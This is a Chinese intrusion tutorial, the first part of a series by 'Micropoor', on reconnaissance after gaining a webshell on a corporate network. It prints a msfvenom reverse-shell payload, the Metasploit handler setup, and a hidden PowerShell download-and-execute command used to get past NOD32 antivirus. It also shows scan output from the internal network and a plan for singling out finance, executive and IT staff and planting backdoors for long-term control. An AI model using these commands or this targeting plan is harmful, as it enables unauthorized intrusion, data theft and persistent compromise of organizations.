渗透的本质是信息搜集(第一季)
目标资产信息搜集的程度,决定渗透过程的复杂程度。
目标主机信息搜集的深度,决定后渗透权限持续把控。
渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。
----Micropoor
文章将连载,从几方面论证,
渗透的本质是信息搜集。
一次完整的网络渗透,不单单是与目标管理人员的权限争夺,一次完整的网络渗透,它分为两大块,
技术业务与
信息分析业务。
而
技术业务要辅助而且要为信息分析业务提供强大的支撑与保证。同时
信息分析业务要为技术业务提供关键的目标信息分析逻辑关系与渗透方向。
案例以下:(
非root/administrator下主动信息搜集)(有马赛克)
在获得一个webshell时,非root/administrator状况下对目标信息搜集相当重要,它会影响后期的渗透是否顺利,以及渗透方向。
目标主机分配了2个内网IP,分别为10.0.0.X与192.168.100.X
得知部分服务软件,以及杀毒软件 NOD32,通常内网中为杀毒为集体一致。web
搜集补丁更新频率,以及系统 情况
搜集安装软件以及版本,路径等。
域中用户以下。而且当前权限为 iis apppool\xxxx
正如上面所说,技术业务须要辅助分析业务。在域组中,其中有几个组须要特别关注,在通常的大型内网渗透中,须要关注大体几个组
(1)IT组/研发组 他们掌握在大量的内网密码,数据库密码等。
(2)秘书组 他们掌握着大量的目标机构的内部传达文件,为信息分析业务提供信息,在反馈给技术业务来肯定渗透方向
(3)domain admins组 root/administrator
(4)财务组 他们掌握着大量的资金往来与目标企业的规划发展,而且能够经过资金,来判断出目标组织的总体架构
(5)CXX组 ceo cto coo等,不一样的目标组织名字不一样,如部长,厂长,经理等。
以研发中心为例:研发中心共计4人。
而且开始规划信息刺探等级:
等级1
:肯定某部门具体人员数量 如研发中心4人
等级2:肯定该部门的英文用户名的具体信息,如姓名,联系方式,邮箱,职务等。以便肯定下一步攻击方向
等级3:分别刺探白天/夜间 内网中所存活机器而且对应IP地址
等级4:对应人员的工做机内网IP,以及工做时间
等级5:根据信息业务反馈,制定目标安全时间,以便拖拽指定人员文件,或登陆目标机器
等级6:制定目标机器后渗透与持续渗透的方式以及后门
刺探等级1
刺探等级2
在 net user /domain 后获得域中用户,但须要在
非root/administrator权限下获得更多的信息来给信息分析业务提供数据,并肯定攻击方向。
在案例中针对nod32,采用powershell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xx -f psh-reflection >xx.ps1
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf exploit(handler) > set lport xxx
lport => xxx
msf > run
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/xxx.ps1');"
注意区分目标及系统是32位仍是64位。
接下来将会用 IIS APPPOOL\XXXX 的权限来搜集更多有趣的信息
某数据库配置 for mssql
白天测试段10.0.0.x段在线主机 for windows (部分)
10.0.0.x 段信息刺探:
IP 1-50 open 3389 (部分)
[+] 10.0.0.2: - 10.0.0.2:3389 - TCP OPEN
[+] 10.0.0.3: - 10.0.0.3:3389 - TCP OPEN
[+] 10.0.0.5: - 10.0.0.5:3389 - TCP OPEN
[+] 10.0.0.7: - 10.0.0.7:3389 - TCP OPEN
[+] 10.0.0.9: - 10.0.0.9:3389 - TCP OPEN
[+] 10.0.0.12: - 10.0.0.12:3389 - TCP OPEN
[+] 10.0.0.13: - 10.0.0.13:3389 - TCP OPEN
[+] 10.0.0.14: - 10.0.0.14:3389 - TCP OPEN
[+] 10.0.0.26: - 10.0.0.26:3389 - TCP OPEN
[+] 10.0.0.28: - 10.0.0.28:3389 - TCP OPEN
[+] 10.0.0.32: - 10.0.0.32:3389 - TCP OPEN
IP 1-255 open 22,25 (部分)
[+] 10.0.0.3: - 10.0.0.3:25 - TCP OPEN
[+] 10.0.0.5: - 10.0.0.5:25 - TCP OPEN
[+] 10.0.0.14: - 10.0.0.14:25 - TCP OPEN
[+] 10.0.0.15: - 10.0.0.15:22 - TCP OPEN
[+] 10.0.0.16: - 10.0.0.16:22 - TCP OPEN
[+] 10.0.0.17: - 10.0.0.17:22 - TCP OPEN
[+] 10.0.0.20: - 10.0.0.20:22 - TCP OPEN
[+] 10.0.0.21: - 10.0.0.21:22 - TCP OPEN
[+] 10.0.0.31: - 10.0.0.31:22 - TCP OPEN
[+] 10.0.0.38: - 10.0.0.38:22 - TCP OPEN
[+] 10.0.0.40: - 10.0.0.40:22 - TCP OPEN
[+] 10.0.0.99: - 10.0.0.99:22 - TCP OPEN
[+] 10.0.0.251: - 10.0.0.251:22 - TCP OPEN
[+] 10.0.0.254: - 10.0.0.254:22 - TCP OPEN
IP 1-255 smtp for version (部分)
msf auxiliary(smtp_version) > run
[+] 10.0.0.3:25 - 10.0.0.3:25 SMTP 220 xxxxxxxxxxxxxxxxx MAIL Service, Version: 7.5.7601.17514 ready at Wed, 14 Feb 2018 18:28:44 +0800 \x0d\x0a
[+] 10.0.0.5:25 - 10.0.0.5:25 SMTP 220 xxxxxxxxxxxxxxxxx Microsoft ESMTP MAIL Service, Version: 7.5.7601.17514 ready at Wed, 14 Feb 2018 18:29:05 +0800 \x0d\x0a
[+] 10.0.0.14:25 - 10.0.0.14:25 SMTP 220 xxxxxxxxxxxxxxxxxt ESMTP MAIL Service, Version: 7.0.6002.18264 ready at Wed, 14 Feb 2018 18:30:32 +0800 \x0d\x0a
在iis apppool\xxxx的权限下,目前得知该目标内网分配段,安装软件,杀毒,端口,服务,补丁更新频率,管理员上线操做时间段,数据库配置信息,域用户详细信息(英文user对应的职务,姓名等),以上数据等待信息分析业务,来肯定攻击方向。如财务组,如cxx组等。而且
完成了刺探等级1-4
而在以上的信息搜集过程当中,提权不在是我考虑的问题了,能够Filezilla server 提权,mssqsl数据库提权,win03 提权,win2000提权,win08提权,iis.x提权,内网映射提权 等。而如今须要作的是如何反制被发现来制定目标业务后门,以便长期控制。
下一季的连载,将会从三方面来说述大型内网的信息刺探,既有0day的admin权限下刺探,无提权下的guest/users权限下刺探。数据库下的权限刺探。域权限延伸到办公PC机的信息刺探。以及只有路由权限下的信息刺探。原来在渗透过程当中,提权是次要的,信息刺探才是渗透的本质。
文章的结尾处按照前几季的风格,依然插入一个段子,一个真实的段子:sql
某大佬:你给我要exp,我什么exp都有吗?提权都靠exp吗?那别作了。
30分钟后…
某大佬:恩,权限拿下来了。
我:我操,怎么提的,X哥。
某大佬:它的数据库配置文件密码,跟ftp密码组合碰撞。root了
某大佬:不是每一个提权都靠exp,好不容易打点个,没exp,难道就不作了。提权的本质是信息搜集,搜集目标的补丁状况,第三方等一切可能利用的。
从那之后,我对提权只有4个字:信息搜集。
一样今天变成老家伙的我,也但愿把这条经验传递下去。
shell